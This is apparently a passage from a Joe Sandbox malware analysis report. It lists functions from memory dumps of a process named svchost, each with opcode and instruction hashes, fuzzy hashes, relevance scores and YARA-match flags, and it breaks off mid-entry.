                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                              • Instruction ID: 7a09b7fa9cffbdb2f4e05d0d7635c974e09d052f73ab3fc7bab5eeb08894ae18
                                                                              • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                              • Instruction Fuzzy Hash: 2A5182B3E14A214BD3188E09CC40631B792FFD8312B5F81BADD199B357CA74E9529A90
                                                                              Function 03AF7D73 Relevance: .2, Instructions: 160COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7480d0718375433fc77a323c9cfb632dd1c865cf9543cdbf312060e9e6466656
                                                                              • Instruction ID: 38db14aedf57af1314f5e5ca0520f7c6de744aa5ee7f235083505909804e4d3f
                                                                              • Opcode Fuzzy Hash: 7480d0718375433fc77a323c9cfb632dd1c865cf9543cdbf312060e9e6466656
                                                                              • Instruction Fuzzy Hash: 0951C136A1014A8FCB08CFA8C480AEEB7F1EF98314B19827ED915DB355E731DA15CB90
                                                                              Function 03A43740 Relevance: .2, Instructions: 159COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 62e832910576d6adbed08cc2b47138aa1a01df0f93294633a789380cc6c25aa0
                                                                              • Instruction ID: 14baf193abc821607c6d58d3f3da0c0bfcc6ca8cbab737ca72ca89da183d8a0b
                                                                              • Opcode Fuzzy Hash: 62e832910576d6adbed08cc2b47138aa1a01df0f93294633a789380cc6c25aa0
                                                                              • Instruction Fuzzy Hash: 54510579A00615AFCB11CF68C480769F7B4FF95710F0942AAE895DB780E734E9A1CBC0
                                                                              Function 0040FFBF Relevance: .2, Instructions: 159COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4e65e0d53bce0ed5dc2747d5d84943ebe9f77f2f9af1d63b20bd671698ba1f3e
                                                                              • Instruction ID: b695ad066945d7c90a1dbc5daac19342224fddc62da2f92e840dc1a4afb145f5
                                                                              • Opcode Fuzzy Hash: 4e65e0d53bce0ed5dc2747d5d84943ebe9f77f2f9af1d63b20bd671698ba1f3e
                                                                              • Instruction Fuzzy Hash: 515160B3E14A214BD318CE09CC40636B692FFD8312B5F81BEDD199B357CA74E9529A90
                                                                              Function 03A37152 Relevance: .2, Instructions: 158COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3de62753f094db0db477ed5fb30864175be209c4d3e01ee99ffb5e90afa4d9aa
                                                                              • Instruction ID: a9b55d9b4565b88b3633d88ae5051021b05ab70c1e98395b23f42eed6828e350
                                                                              • Opcode Fuzzy Hash: 3de62753f094db0db477ed5fb30864175be209c4d3e01ee99ffb5e90afa4d9aa
                                                                              • Instruction Fuzzy Hash: C851E176A0060AEFEF15DF64C944BADB7F8BF46315F1441ABE402A76A0EB749911CF80
                                                                              Function 03AB3A6C Relevance: .2, Instructions: 156COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 28f25674bd7812529728c4a807f1b3a7aad6acb568bc368bb3341bdfd070c871
                                                                              • Instruction ID: 477aaac31d32c0ad89f2ced593988b6425b949bd9d12c21f7d126f4d8b42c527
                                                                              • Opcode Fuzzy Hash: 28f25674bd7812529728c4a807f1b3a7aad6acb568bc368bb3341bdfd070c871
                                                                              • Instruction Fuzzy Hash: C9519E37E4012D4BEF24CA58D461BEFB3F6EB44310F48086AE849BB3C5C6B66A57D550
                                                                              Function 03AAD800 Relevance: .2, Instructions: 155COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 80d4643433773eaa82b24366a5f607725bdab2eb491ba1c22f0e916330656c0c
                                                                              • Instruction ID: 48871060aeace8029d0d9688ad1bb4a9ecd59f3ea998dffd3849c5886cd40752
                                                                              • Opcode Fuzzy Hash: 80d4643433773eaa82b24366a5f607725bdab2eb491ba1c22f0e916330656c0c
                                                                              • Instruction Fuzzy Hash: 9051DE75A00A15ABCB14DF6DC4A0ABEB7B4FF45700B0845AFE881DBB90E734D850CB90
                                                                              Function 03AFD26B Relevance: .2, Instructions: 153COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                              • Instruction ID: c970e9fe573c1af63cd567b5c8aae5e67697c4d564573698d9fe539917759118
                                                                              • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                              • Instruction Fuzzy Hash: AE516E766087429FC716CFA8C884B5AB7E5FBC8344F048A2EFA948B344D734E905CB52
                                                                              Function 03AF7571 Relevance: .2, Instructions: 153COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0ddd4e82306d5514fffa1f1b30874c7f09d1d458be5fe5861797eb9008640ed2
                                                                              • Instruction ID: 68c30fc4fea65421fdc3a0ea6b39f371216c27a6d816228f390c1ece2cd57697
                                                                              • Opcode Fuzzy Hash: 0ddd4e82306d5514fffa1f1b30874c7f09d1d458be5fe5861797eb9008640ed2
                                                                              • Instruction Fuzzy Hash: 59510531A00219AFCB14DFA9C944A7EFBB9FF48384F08416AFA05D7250DB75AE11CB80
                                                                              Function 03A351ED Relevance: .1, Instructions: 149COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5fba3cbec30ef7f11953d733d1d9ba3a645fb0fbc9e6201e0af211e94a61101e
                                                                              • Instruction ID: 42f7cc77a01b81686140aafccc28d2ad0fda692e3a207240d397009c148d56b2
                                                                              • Opcode Fuzzy Hash: 5fba3cbec30ef7f11953d733d1d9ba3a645fb0fbc9e6201e0af211e94a61101e
                                                                              • Instruction Fuzzy Hash: 0B518975E05314DFEF25DBA9C940BADB7B8AF0B358F18006BF811EB240D7B498408B52
                                                                              Function 03A6F71F Relevance: .1, Instructions: 143COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: abe8939629acf6f74f1629921e0e57b513a28d699f55ced77cb34f2c58e4a753
                                                                              • Instruction ID: 9a282a144b54202e5bd0a708d7673d338cd7a61dfa54191f7d7ba09c24769ee9
                                                                              • Opcode Fuzzy Hash: abe8939629acf6f74f1629921e0e57b513a28d699f55ced77cb34f2c58e4a753
                                                                              • Instruction Fuzzy Hash: 8741947AD05229AFDF11EBA8D984ABFB6BCAF05654F05016BE900FB700D634DE4187E4
                                                                              Function 03A601F8 Relevance: .1, Instructions: 138COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a13fe27dc36b64178cbd73f66f4d810b6ea9621728028c8166da154b9894bd6d
                                                                              • Instruction ID: cd74ec1f834fef3c3153543b04f7eb664e192176b9a14b5f8926dfacb357e63b
                                                                              • Opcode Fuzzy Hash: a13fe27dc36b64178cbd73f66f4d810b6ea9621728028c8166da154b9894bd6d
                                                                              • Instruction Fuzzy Hash: BD41AD369042149BCB14DFA8C440AEEF7B8BF88610F18816FE916EB340D7359C81CBA4
                                                                              Function 03A72750 Relevance: .1, Instructions: 137COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                              • Instruction ID: afcfc4699c94579a887cca113cd85968202e1e51533d46946c1a901978bf4a17
                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                              • Instruction Fuzzy Hash: 96512B76A00615DFCB15CF58C580AAEF7F6FF84710F2885AAD855A7350D734AE81CB90
                                                                              Function 03AAD1C0 Relevance: .1, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                              • Instruction ID: e9a6f7041004389dff19125b2f7aa8799e1f285cd93d13f3fbc6f5400b0d7e94
                                                                              • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                              • Instruction Fuzzy Hash: C4512776A00606DFCB18CF68C4916AAFBF1FF48314B18856ED859A7745E734EA90CF90
                                                                              Function 03A36154 Relevance: .1, Instructions: 133COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2387cf2c5b78db35841b9efe40dfae152d7dbb73d2704d80f96d98a73893a910
                                                                              • Instruction ID: 236daf51bb0c6ae78cf5fd7eb0101e8232631da74c31a31768f8dc81931cecfd
                                                                              • Opcode Fuzzy Hash: 2387cf2c5b78db35841b9efe40dfae152d7dbb73d2704d80f96d98a73893a910
                                                                              • Instruction Fuzzy Hash: 2E51F870904216EBDB29DB64CD44BE8BBB5EF02314F1842EBE429AB7D1E7785981CF40
                                                                              Function 03A2B136 Relevance: .1, Instructions: 131COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ef7d1b605d209e038ae8b93e532e6e9b02191fd236c340c03f71a01e6055b314
                                                                              • Instruction ID: 71ee399c0f34915b535935543d96d3c8e727deaaaf8301294af87332d382f584
                                                                              • Opcode Fuzzy Hash: ef7d1b605d209e038ae8b93e532e6e9b02191fd236c340c03f71a01e6055b314
                                                                              • Instruction Fuzzy Hash: 8341AC75640311EFDB25EF68CA80B6ABBB8EF50794F04446BE9559B690E774D800CFA0
                                                                              Function 03AFF0E0 Relevance: .1, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5e82f068e2f2f586f48d6c844784d22b7a51cb523507a4506aa1bcade9f7315d
                                                                              • Instruction ID: 64411042a8576488a333d1fa877dbe426e3e01269785eec26aed22b9841dbab5
                                                                              • Opcode Fuzzy Hash: 5e82f068e2f2f586f48d6c844784d22b7a51cb523507a4506aa1bcade9f7315d
                                                                              • Instruction Fuzzy Hash: B741D0712083418FD708CF65D8A497ABBE1EBD4315F088A5EF9D58B382C730D909CB61
                                                                              Function 03ADD5B0 Relevance: .1, Instructions: 128COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 48c74ee4c5d5cec4b37b7ae190121a5aa55c03bc0b6d38ced6f1a9704ab9af32
                                                                              • Instruction ID: 22a007878fb60635cccdfec5176d69b7744f50f8e29c92b4d960d46df4404588
                                                                              • Opcode Fuzzy Hash: 48c74ee4c5d5cec4b37b7ae190121a5aa55c03bc0b6d38ced6f1a9704ab9af32
                                                                              • Instruction Fuzzy Hash: 0541F330A182959FCB14DF29C495ABAFBF1FF49304F09849EE4C68F245C739A456DBA0
                                                                              Function 03A5D6E0 Relevance: .1, Instructions: 126COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 557f067e558d842146512f298a608c81dcb2e9df9331c59b11733928417bc36b
                                                                              • Instruction ID: 96665835fd596636859ec5ef78f3c4ef373738e8a1d8b4dfa067c19582c2ddd9
                                                                              • Opcode Fuzzy Hash: 557f067e558d842146512f298a608c81dcb2e9df9331c59b11733928417bc36b
                                                                              • Instruction Fuzzy Hash: C041B17A6043009FD734EF25CA90F6AB7E8EB55325F04062FF9159B791DB30A841CB91
                                                                              Function 03A2A020 Relevance: .1, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                              • Instruction ID: 85605252fdda36095df2e9976601e6e6b09bb849c7cbac62f9e63c5e19e2bf0c
                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                              • Instruction Fuzzy Hash: E9411831A08225DFDB24EFA985507BAFB72EB90754F19806FE9459B340DA35DD80CBA0
                                                                              Function 03A60710 Relevance: .1, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                              • Instruction ID: 156c34da78cfa37cd22670eaf5e2b5fe98b70a5d4b7a42969d9e23d2a21a96d1
                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                              • Instruction Fuzzy Hash: 85412E75A04705EFDB24CFA9C980AAAB7F8FF19700B10496EE556DB690D730EA84CF50
                                                                              Function 03A3262C Relevance: .1, Instructions: 119COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e0cb7fe9442b40dcd26970f5b1be242c54c9567b217bbdc7f8f4ae0b29bdfe9a
                                                                              • Instruction ID: 615f5e7d0505f0bed8799da86aaec5dcd9c9417d71e83394ee427c0df1ec41e0
                                                                              • Opcode Fuzzy Hash: e0cb7fe9442b40dcd26970f5b1be242c54c9567b217bbdc7f8f4ae0b29bdfe9a
                                                                              • Instruction Fuzzy Hash: 4341EE75901714CFCB21EF28DA40B69B7B5FF86314F148AAFE4169B7A0EB309941CB40
                                                                              Function 03AFFFB1 Relevance: .1, Instructions: 117COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6c99b14e06c4aaadc6873958652cedf5628644bc831ec42239f22f5d7dee6f27
                                                                              • Instruction ID: 5eaa930af206372ec4c1c91922ee5680cba4040d3b7b44f758a32d8076ba939c
                                                                              • Opcode Fuzzy Hash: 6c99b14e06c4aaadc6873958652cedf5628644bc831ec42239f22f5d7dee6f27
                                                                              • Instruction Fuzzy Hash: 6F413831A042595BD740DB2685A0ABABFF1EF85209F0CC1FAD8C1DB286E639C506C770
                                                                              Function 03AB07C3 Relevance: .1, Instructions: 114COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ee9f20dfa75fcb94340cb645a87c0e383c330c020f1aa502f44ae28e523721a0
                                                                              • Instruction ID: dab232aaa158c20a5d6b7e951c0925530377887a9f5b6434fa6a72b5a524b4a8
                                                                              • Opcode Fuzzy Hash: ee9f20dfa75fcb94340cb645a87c0e383c330c020f1aa502f44ae28e523721a0
                                                                              • Instruction Fuzzy Hash: EA417C76508304AFD320EF69C945B9BBBE8FF88664F004A2FF998D7251D7709905CB92
                                                                              Function 03AFFA49 Relevance: .1, Instructions: 113COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 07f1b816e10b4df0c9ca3f7891afbf7c3364f832b540bc2d0d44f92a33f6ff88
                                                                              • Instruction ID: 7f0f85ee54c370ddac50931d314be29eeb5bf6057356eb64217508eb3eafa56f
                                                                              • Opcode Fuzzy Hash: 07f1b816e10b4df0c9ca3f7891afbf7c3364f832b540bc2d0d44f92a33f6ff88
                                                                              • Instruction Fuzzy Hash: 803159367001069FC718DF69CC44AA3BBA9EF84710F08867AFA18CB385E774D945C390
                                                                              Function 03AFEEDB Relevance: .1, Instructions: 113COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db51585a54c2106c8cea4439f873848eaa7a3c032944ca4384e6e1da048bfa08
                                                                              • Instruction ID: 895409a17e050800ff0593ef7eca4f004c4270f221cf4b06a4151439ddee1234
                                                                              • Opcode Fuzzy Hash: db51585a54c2106c8cea4439f873848eaa7a3c032944ca4384e6e1da048bfa08
                                                                              • Instruction Fuzzy Hash: 5A418433E0412A8FCB18DF68D59197AF7F5FB4830475642BEE905AB294DB34AE05CB90
                                                                              Function 03AFFB76 Relevance: .1, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 99df16872ca346521ff76e8fd0c288bf1e648b919504b48b970d90989db0cb42
                                                                              • Instruction ID: 70f1bd8bc3b8287fa12f6188ef22cde2e920661b248cb4387545c364394762ba
                                                                              • Opcode Fuzzy Hash: 99df16872ca346521ff76e8fd0c288bf1e648b919504b48b970d90989db0cb42
                                                                              • Instruction Fuzzy Hash: C631F436610115AFD714DFA9CD48AABBBF5EF88354F44857AFA08CF244D634E902C790
                                                                              Function 0040E1E3 Relevance: .1, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                              • Instruction ID: b220e7cc2b21b91a0a46edb43cf08ba8952aa894711fd27decb0b2e0fdf70c5b
                                                                              • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                              • Instruction Fuzzy Hash: 4F3193116586F10DD30E836E08BD675AEC18E9720174EC2FEDADA6F2F3C0888418D3A5
                                                                              Function 03A402E1 Relevance: .1, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                              • Instruction ID: 91c37f0ba8076008ccebf34710c73a99192e1493555dc1f27d2b366501c43c9f
                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                              • Instruction Fuzzy Hash: C9310732A04244AFDB21DB68CC44B9AFFF9FF45350F0885ABE855DB351D674A844CBA0
                                                                              Function 03A59274 Relevance: .1, Instructions: 105COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b20980e25f55a32faa56c6de298ff1685e3a4589dd3fd19363150c15c00d0785
                                                                              • Instruction ID: c1a608a8e716a2defa4559a10c55687a07381f7245e1b33901e01bf14dec8919
                                                                              • Opcode Fuzzy Hash: b20980e25f55a32faa56c6de298ff1685e3a4589dd3fd19363150c15c00d0785
                                                                              • Instruction Fuzzy Hash: DC314275A00328EFDB21DB24CD40B9BB7B9AF85760F55019EB94DAB380DB309E448B51
                                                                              Function 03A35702 Relevance: .1, Instructions: 104COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 85b1584032fba150422f2ef6af11059dc0812b7c552f82e51ddfbf8546a1b94e
                                                                              • Instruction ID: caf1a03fe6c60628a0dd6fc9f079145a43c22c04453db36417d2087b7fbf7f56
                                                                              • Opcode Fuzzy Hash: 85b1584032fba150422f2ef6af11059dc0812b7c552f82e51ddfbf8546a1b94e
                                                                              • Instruction Fuzzy Hash: B131CE35701A02FFDB55DB28CA80A99FBA9BF46354F04456BE8019BB50DB70E820CBD0
                                                                              Function 03A34260 Relevance: .1, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d094bcd91e6f5b04b4608259ca810b4c4d3347fedabf7c6c4b16d72ee756281a
